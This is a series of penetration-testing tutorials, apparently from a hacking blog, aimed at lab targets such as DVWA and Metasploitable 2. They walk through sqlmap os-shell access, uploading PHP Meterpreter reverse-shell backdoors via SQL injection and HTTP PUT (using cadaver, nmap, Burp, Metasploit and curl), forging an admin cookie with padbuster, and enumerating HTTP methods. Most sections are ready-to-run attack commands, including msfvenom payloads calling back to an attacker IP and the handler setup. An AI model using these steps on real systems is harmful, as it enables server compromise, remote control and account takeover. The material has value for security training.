Meterpreter Shell uploading in DVWA with SQl Injection

This article is exactly same as previous article; today I will make use of sqlmap to upload backdoor filein DVWA suffering from sql injection vulnerbility.

Requirement:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp suite, sqlmap tool

Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here
Now open the DVWA in your pc and login with following credentials:

Username – admin
Password – password

Click on DVWA Security and set Website Security Level low

From the list of vulnerability select SQL Injection for your attack. Type user ID: 1 in text box.  Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.  


Turn on burp suite click on proxy in menu bar and go for intercept is on button. Come back and click on submit button in dvwa. The Intercept button is used to display HTTP and Web Sockets messages that pass between your browser and web servers. Burp suit will provide” cookie” and “referrer” under fetched data which will later use in sqlmap commands.


In following Sqlmap will analysis the url for making connection from target and then use sql queries for given cookies to fetch all names of database.

sqlmap -u “http://192.168.0.102/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” --cookie=” security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovma5q47; security_level=0″  --dbs


So if you notice image given below it has dumb all name of database. Choose dvwa to upload php backdoor.


Now Type following command to run sqlmap to access os-shell of web server (dvwa)
sqlmap -u “http://192.168.0.102/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” --cookie=” security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0″  -D dvwa –os-shell


It will try to generate a backdoor; I want to create PHP backdoor in target pc therefore type 4 for PHP payload and then Type 4 for brute force search to use as writable directory to upload


It is trying to upload the file on “/xampp/htdocs/” by using different sql injection techniques. As soon as file is uploaded; it will send INFO the file stager has been successfully uploaded on “/xampp/htdocs/”and you will get os-shell of victim pc. Other than here it also shows the path where

you can manually upload your backdoor, look at over highlighted URL:

http://192.168.0.102/tmpunias.php


Explore the URL:http://192.168.0.102/tmpunais.php on browser. From screenshot you can read the heading of web page sqlmap file uploader which will let you to browse you backdoor on web server(dvwa) and will later upload that backdoor to following directory (“/xampp/htdocs/” )of web server.


Let’s prepare the malicious file that you would upload with msfvenom :

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.0.104 lport=4444 -f raw. 

copy the code from 

Now load metasploit framework by typing msfconsole and start multi/handler


Click on browse to select your shell.php file and then click on upload.


GREAT!!!  Here it shows Admin File is uploaded which means backdoor shell.php is uploaded.


To execute backdoor on target pc run URL:192.168.0.102/shell.php on browser and you will receive reverse connection to multi/handler.

msf> use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
meterpreter>sysinfo
Divine!!!  meterpreter session is opened .


Hack Padding Oracle Lab (CTF Challenge)

The main purpose to solve this lab was to share the padding oracle attack technique with our visitors

The padding oracle attack enables an attacker to decrypt encrypted data without knowledge of the encryption key and used cipher by sending skillful manipulated cipher texts to the padding oracle and observing of the results returned by it. This causes loss of confidentiality of the encrypted data. E.g. in the case of session data stored on the client side the attacker can gain information about the internal state and structure of the application. A padding oracle attack also enables an attacker to encrypt arbitrary plain texts without knowledge of the used key and cipher. If the application assumes that integrity and authenticity of the decrypted data is given, an attacker could be able to manipulate internal session state and possibly gain higher privileges.


 First you need to download padding oracle from here. Now install the iso image in VM ware and start it.

Start kali Linux as well as explore target IP: 192.168.1.29 on browser. Now at this point you need to create a user account, click on register option.


Now register username with its password and then login to exploit this vulnerability. I registered as raj: 123


Once you create a user account get on login panel and at the same time make use of burp suite to capture the cookies.


Turn up burp suite and don’t forget to set manual proxy of your browser. Now open proxy tab and hit intercepts on button to capture the request of target. When this is done you will get fetched data under intercept window. Here you will find that I try to login with credential raj: 123


Now right click on its window and a list of options will appear. Further click on send to repeater. Come across over screenshot here you will find two panel left and right for request and response respectively.
In left panel send username: raj and password: 123 as request; click on GO button to forward this request and which will further generate a cookie for auth as response in right panel.

Copy the highlighted cookie and this will be use in below command.


Next open terminal to run following command which contains target URL plus above copied cookie

padbuster http://192.168.1.102/login.php wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG 8 --cookies auth=wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG --encoding 0

Python-paddingoracle is a Python implementation heavily based on PadBuster, an automated script for performing Padding Oracle attacks, developed by Brian Holyfield of Gotham Digital Science. Above command will decrypt the encrypted value of auth into plaintext. Further type 2 where it asked ID recommended.


Last part of screenshot has captured three decrypt values in base64, HEX and ASCII. The cookie of auth is combination of username with its password from padbuster we come to know what is encrypted value of username for raj.


We are very near to our goal just encrypt this auth cookie with user as admin once again. Here we have our plaintext as admin and lets encode it using padbuster.

padbuster http://192.168.1.102/login.php wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG 8 --cookies auth=wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG --encoding 0 –plaintext user=admin
Further type 2 where it asked ID recommended.


Here the highlighted part is our encrypted value for admin. Copy It”BAit--------AAAA”.


Go to burp suit once again and click on params under intercept frame; it contains two fields as username and password, now add third field for auth value. Click on ADD button on the right side of frame which will add another row in params. 


Here it has three columns: type, name, and value; paste the above encrypted value in these columns as type: cookie, name: auth, value: BAit------AAAAAA which we have got from padbuster. Then Click on forward to send this request on web server.

Again click on forward to send it.


As request sent by burp suite automatically on web server you will get logged in as admin account.
Congrats!!! We meet the goal of this lab.

Multiple ways to Exploiting PUT Vulnerability in Webserver

 Hi Friends, today’s article is related to exploiting the HTTP PUT method vulnerability through various techniques. First we will determine if the HTTP PUT method is enabled on the target victim machine, post which we will utilize several different methods to upload a Meterpreter reverse shell on the target and compromise the same.
Target: Metasploitable 2
Attacker: Kali Linux machine
PUT method was originally intended as one of the HTTP method used for file management operations. If the HTTP PUT method is enabled on the webserver it can be used to upload a malicious resource to the target server, such as a web shell , and execute it
As this method is used to change or delete the files from the target server’s file system , it often results in arise in various File upload vulnerabilities , leading the way for critical and dangerous attacks .As a best practice , the file access permissions of the organizations’ critical servers should be strictly limited with restricted access to authorized users, if in case the organization absolutely MUST have these methods enabled.
Note : In this tutorial we are using a Vulnerable target machine for Pentesting purposes and to illustrate the use of various tools . This is purely meant for educational purposes in the testing environment and should not be used in Production environment without the authorized permissions from the relevant authorities/management.
Let’s Begin!!!!
Boot your Kali Linux machine (IP : 192.168.1.105) and in parallel, type victim IP as 192.168.1.103 in the Firefox browser and click on WEBDAV. As we can see from the screenshot it is listing only the parent directory. 
 


First of all we need to ensure that the vulnerable target machine has the HTTP PUT method allowed for us to upload malicious backdoors.In order to confirm the same , we need to scan the target using Nikto .
Nikto is a popular Web server scanner that tests Web servers for dangerous files/CGIs, outdated server software and other issues. It also performs generic and server type specific checks.Below is the command to scan the URL:
nikto -h http://192.168.1.103/dav/
Upon running the above command , we can observe that the highlighted part in below screenshot displays that HTTP PUT method is allowed. Now let’s hack the vulnerable target machine by uploading the PHP malicious file ,using the various techniques shown in upcoming sections.




Prepare the malicious file to be uploaded with msfvenom :
Msfvenom can be used to create PHP meterpreter payload that gives us a reverse shell. Execute the following command to perform the same
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.105 lport=4444 -f raw
Copy the code from and save it in a file with .php extension as shell.php file , on the desktop .This will be utilized later in the upcoming sections , to upload the file on web server.




In parallel, load the metasploit framework by typing msfconsole on a new terminal and start multi/handler.This will be utilized in the later part of the section
Cadaver
Cadaver is a command line tool pre-installed in the Kali machine that enables the uploading and downloading of a file on webdav.
Type the target host URL to upload the malicious file , using the command given below.
cadaver http://192.168.1.103/dav/
Now once we are inside the victim’s directory, upload the file shell.php from the Desktop to the target machine’s path, by executing the below command :
put /root/Desktop/shell.php



To verify whether the file is uploaded or not, run the URL: 192.168.1.103/dav/ on the browser. Awesome!!! As we can see , the malicious file shell.php has been uploaded on the web server.


Now, let’s launch Metasploit framework and start a handler using the exploit/multi/handler module. Assign the other values like the LHOST and LPORT values to the Kali machine’s IP and port to listen on , respectively. Once done, execute by running the command exploit to start listening for the incoming connections.

msf> use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.105
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

Press Enter and we will observe that the reverse TCP handler has been started on Kali IP 192.168.1.105:4444.
Now go back to the previously uploaded shell.php file and click on the same.Once run , we will get TCP reverse connection automatically on the meterpreter shell. Further run the sysinfo command on the meterpreter session to get machine OS / architecture details.
meterpreter>sysinfo



NMAP
Nmap is an opensource port scanner and network exploitation tool.If PUT Method is enabled on any webserver, then we can also upload malicious file to a remote web server with the help of NMAP.Below is the command to configure the same . We must specify the filename and URL path with NSE arguments .In parallel , prepare the malicious file nmap.php to upload to target server.
nmap -p 80 192.168.1.103 --script http-put --script-args http-put.url='/dav/nmap.php',http-put.file='/root/Desktop/nmap.php'
As seen from the below screenshot , nmap.php file has been uploaded successfully.




Type the same URL in browser 192.168.1.103/dav and execute the same. As evident from the screenshot , the file nmap.php has been uploaded on the web server.




Simultaneously, open metasploit MSF console and use multi/handler; then go back to previously uploaded nmap.php file and run it. As can be seen below , this will give us a meterpreter session.




Poster
Poster is a Firefox Add-on and a developer tool for interacting with web services to let the end user trigger the HTTP requests with parameters like: GET, POST, PUT and DELETE and also enables to set the entity body, and content type
Prepare the malicious file poster.php that you would like to upload to the target machine. Install the Poster plug-in from Firefox Add-on. Click on the tools from the menu bar. And then click on Poster from the dropdown menu. A following dialog box will open. Type the URL as mentioned in the screenshot and provide the path of the malicious file to be uploaded via Browse option and finally click on PUT action.




Type the same URL in browser 192.168.1.103/dav and execute the same. As evident from the screenshot , the file poster.php has been uploaded on the web server.




Simultaneously, open metasploit MSF console and use multi/handler; then go back to previously uploaded poster.php file and run it. This will give us a meterpreter session.



Burpsuite
Burpsuite is one of the most popular proxy interception tool whose graphical interface can be effectively utilized to analyze all kind of GET and POST requests.
Configure the manual proxy settings of end users’ browser so as to intercept the GET request Browse the URL http://192.168.1.103 but don’t hit ENTER yet . In parallel , let us navigate to the Burpsuite Proxy tab and click Intercept is on option under the Intercept sub-option , to capture the request. As soon we hit ENTER in the users’ browser , we will be able to fetch the data under the intercept window.
Now right click on the same window and a list of multiple options will get displayed. Further click on Send to repeater.




In the below highlighted screenshot , we will observe two panels - left and right for the HTTP Request and HTTP Response respectively . The GET method can be observed in the HTTP request and we will now replace GET with the PUT method in order to upload the file with name burp.php comprising of malicious content/code.
Type PUT /dav/burp.php HTTP/1.1 in the header and then paste the php malicious code starting from



Verify and confirm the file upload by browsing the same URL 192.168.1.103/dav in the end users’ browser and we can see burp.php file has been uploaded in the /dav directory of the web server.



Simultaneously, open metasploit MSF console and use multi/handler; then go back to previously uploaded burp.php file and run it. This will give us a meterpreter session.



Metasploit
Metasploit Framework is a well known platform for developing, testing, and executing exploits. It is an open source tool for performing various exploits against the target machines. This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE. PUT is the default.
Metasploit has in-built auxiliary modules dedicated to scan HTTP methods and gives us the ability to PUT a file with auxiliary/scanner/http/http_put.Below are the commands to accomplish same
msf> use auxiliary/scanner/http/http_put
msf>auxiliary (http_put) > set rhosts 192.168.1.103
msf>auxiliary (http_put) > set payload php/meterpreter/reverse_tcp
msf>auxiliary (http_put) > set path /dav/
msf>auxiliary (http_put) > set filename meter.php
msf>auxiliary (http_put) > set filedata file://root/Desktop/meter.php
msf>auxiliary (http_put) > exploit



Type the same URL in browser 192.168.1.103/dav and execute the same. As evident from the screenshot , the file meter.php has been uploaded on the web server.




Simultaneously, open metasploit MSF console and use multi/handler; then go back to previously uploaded meter.php file and run it. This will give us a meterpreter session.



 cURL
cURL is a well-known command line tool to send or receive the data using the URL syntax and is compatible with various well-known protocols (HTTPS, FTP, SCP, LDAP, Telnet etc.)
To exploit PUT method with cURL, the command is:
curl http://192.168.1.103/dav/ --upload-file /root/Desktop/curl.php -v



Type the same URL in browser 192.168.1.103/dav and execute the same. As evident from the screenshot , the file curl.php has been uploaded on the web server.







Simultaneously, open metasploit MSF console and use multi/handler; then go back to previously uploaded curl.php file and run it. This will give us a meterpreter session.

Penetration Testing of HTTP Protocol (Verb Tempering)

You all are very much aware of HTTP protocol and its services. HTTP is considered to authorize intermediate network elements to develop communications between clients and servers. HTTP is an application layer protocol designed within the framework of the Internet protocol suite.

List of Valid HTTP request Methods

GET: It is basically a method used for just receiving some data from the server or specific resource. This method requests are used only to read data and not for alteration and also may return cached data, the requests remain in the browser history.

Post: This method make request to send data to the server or resource. Its requests cannot be bookmarked more over requests have no limitations on data length. The parameters are not saved in browser history

Head: The HEAD method is used to query only for information about a document, not for the document itself. HEAD is much faster than GET, as a much smaller amount of data is transferred.

Put: PUT involves to upload a file or completely replace whatever is available at the given URL with the client defined URL. Attacker took advantage of this method.

Delete: Through delete action a client or attacker get chance to remove file from server or can lead cascade and rollback of several transactions or message which can interrupt the communication.

Connect: Establishes a tunnel to provide secure connection and communication between client and server for examples HTTP proxy and SSL encryptions.

Options: The OPTIONS returns the HTTP methods that the server supports for the specified URL. It is used to describe the communication options for the target resource.

Trace: This method simply come back to the client whatever string has been sent to the server, and is used mainly for debugging purposes.

In this article we are going to perform http verb tampering and try to find out which method is allowed in host server.

LETS START!!!!
Boot up your kali Linux and turn on terminal to identify the running verbs in host IP. I will perform same task with different techniques.


Metasploit

 Now Type msfconsole on terminal to load metasploit framework and use following module to identify supported options.

This module use to Display available HTTP options for each system.
msf > use auxiliary/scanner/http/options
msf auxiliary(options) >set rhosts 192.168.1.43
msf auxiliary(options) >set rport 80
msf auxiliary(options) >exploit


Look over highlighted part in screenshot that is showing which methods are allowed under HTTP (GET HEAD POST OPTIONS TRACE).


Curl

Through you can identify the running services on target IP. Type following command to make curl run.
Curl –v –X OPTIONS 192.168.1.43

From screenshot it is confirm that curl is working properly by dumping same result as above. The highlighted part is showing which methods are allowed under HTTP (GET HEAD POST OPTIONS TRACE).


NIKTO

It another tool to perform same function and try to analysis allowed method for HTTP. Execute the following command on terminal once again to scan target IP.

Nikto –h 192.168.1.43

Pretty good!!!  Now perceive towards screenshot the result is exactly same as above HTTP (GET HEAD POST OPTIONS TRACE).


Nmap

Nmap script finds out what options are supported by an HTTP server by sending an OPTIONS request.

Nmap –script http-methods –script-args http-method.test-all=’/192.168.1.43’ 192.168.1.43

Superb!!!  Not only it dumps the allowed method under HTTP (GET HEAD POST OPTIONS TRACE CONNECT) but also shown the potentially risky methods i.e. TRACE and CONNECT.


Netcat

Try to connect with victim through netcat this will also demonstrate the victim and inform about the allowed methods.

Nc 192.168.1.43 80

Hence result from all six techniques is around same we have got that (GET HEAD POST OPTIONS TRACE) are some verb allow by HTTP.